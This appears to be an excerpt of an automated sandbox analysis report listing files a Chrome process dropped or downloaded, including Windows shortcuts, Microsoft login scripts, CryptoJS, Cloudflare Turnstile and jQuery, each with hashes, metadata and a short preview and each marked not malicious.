                                                                Preview:L..................F.@.. ...$+.,......$La..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZJ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............./M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2689
                                                                Entropy (8bit):4.016819502061891
                                                                Encrypted:false
                                                                SSDEEP:48:8jdrTz3AHUidAKZdA14meh7sFiZUkmgqeh7sBy+BX:8xvtnzy
                                                                MD5:1D3200B7A3C4C81C3F6413939E6F1006
                                                                SHA1:832906A9699EA7C84273E0DD6FEE0796F06C7B58
                                                                SHA-256:B312DBD87E223CD2D7B927DED055895925E56FFC90D1EE8F59E1C8C1C0EEB5CE
                                                                SHA-512:5B4A7DFD3A354906CB18E771AFA849920A603928E9B425F8F13809E9DE7FC0CEB8C6D62DB0C1BBE6DC51374D9BE213FAFBC15121A975B0D2CBD272C05ACA4DF3
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZJ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............./M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 20:35:59 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):4.004649746588808
                                                                Encrypted:false
                                                                SSDEEP:48:8UbdrTz3qHUidAKZdA1TehDiZUkwqehby+R:8Upv0py
                                                                MD5:1F3A5196DBAF5EE2A1CC32179F34BED8
                                                                SHA1:B594750804441FDBE1134381240FBD0FE5EBA307
                                                                SHA-256:7F1966D54543EFBFFC3B353BADE43877AA686E590B9966C4E6C3CF683C2D0468
                                                                SHA-512:CB2CDA17F0AEDDA09FAD1EBAFCC0A8A0ED12B5D477F057857E129E8EA253B450FA2EFB72AC38F8217F1B47DEE607E6BB88307B999B49489BFD93C8DFB8476A0D
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,....PB.$La..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZJ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............./M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 20:35:59 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.9939913838887042
                                                                Encrypted:false
                                                                SSDEEP:48:8IdrTz3qHUidAKZdA1dehBiZUk1W1qehty+C:8sv09Ny
                                                                MD5:EAC75A5DA728F19BD3017260076FE639
                                                                SHA1:3300B92D0C9476AFDEFC90DB6C1949BD746A96F9
                                                                SHA-256:66B441C44281F72048AC436209733BF82AE46EEF7B69902966F16217CC947329
                                                                SHA-512:894EEF3722DB171E897F9EFE135552DC9CA06A8B838C806B94B4C56BE9027739B801DD81C0BD8B551C876839FF61C3A054D9A0657AAFEC931B6A12DBE17832AC
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,....,..$La..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZJ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............./M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 20:35:59 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):4.004836898953297
                                                                Encrypted:false
                                                                SSDEEP:48:8hdrTz3qHUidAKZdA1duTeehOuTbbiZUk5OjqehOuTbzy+yT+:8nvGTfTbxWOvTbzy7T
                                                                MD5:724E838F441EAC808C9F28990FF5A9F0
                                                                SHA1:DBBC7966C3C54E13FF7E77F96788D57908A15D9A
                                                                SHA-256:133A26BA5172713A90565C2519A6FAC0CB72AAFFC602FADD44394B0DBF27FC5B
                                                                SHA-512:1B1BF9DC22DA39CAFDD0D418D90433EB0C250E02637802278F6D7FB0DE5634ACDC277E9735969310FC96346FA23767989C77A4BA34CE9FB8DCD8F6449C0EFF75
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,......x$La..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZJ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............./M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                Category:downloaded
                                                                Size (bytes):61052
                                                                Entropy (8bit):7.996159932827634
                                                                Encrypted:true
                                                                SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):3452
                                                                Entropy (8bit):5.117912766689607
                                                                Encrypted:false
                                                                SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                Malicious:false
                                                                URL:https://login.live.com/Me.htm?v=3
                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                Category:dropped
                                                                Size (bytes):61052
                                                                Entropy (8bit):7.996159932827634
                                                                Encrypted:true
                                                                SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                Malicious:false
                                                                Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:downloaded
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47520)
                                                                Category:downloaded
                                                                Size (bytes):47521
                                                                Entropy (8bit):5.398500199255723
                                                                Encrypted:false
                                                                SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                MD5:301F68F3D8317AB22D4021E266C9A853
                                                                SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                Malicious:false
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:dropped
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                Category:downloaded
                                                                Size (bytes):116343
                                                                Entropy (8bit):7.997640489040715
                                                                Encrypted:true
                                                                SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 56 x 87, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
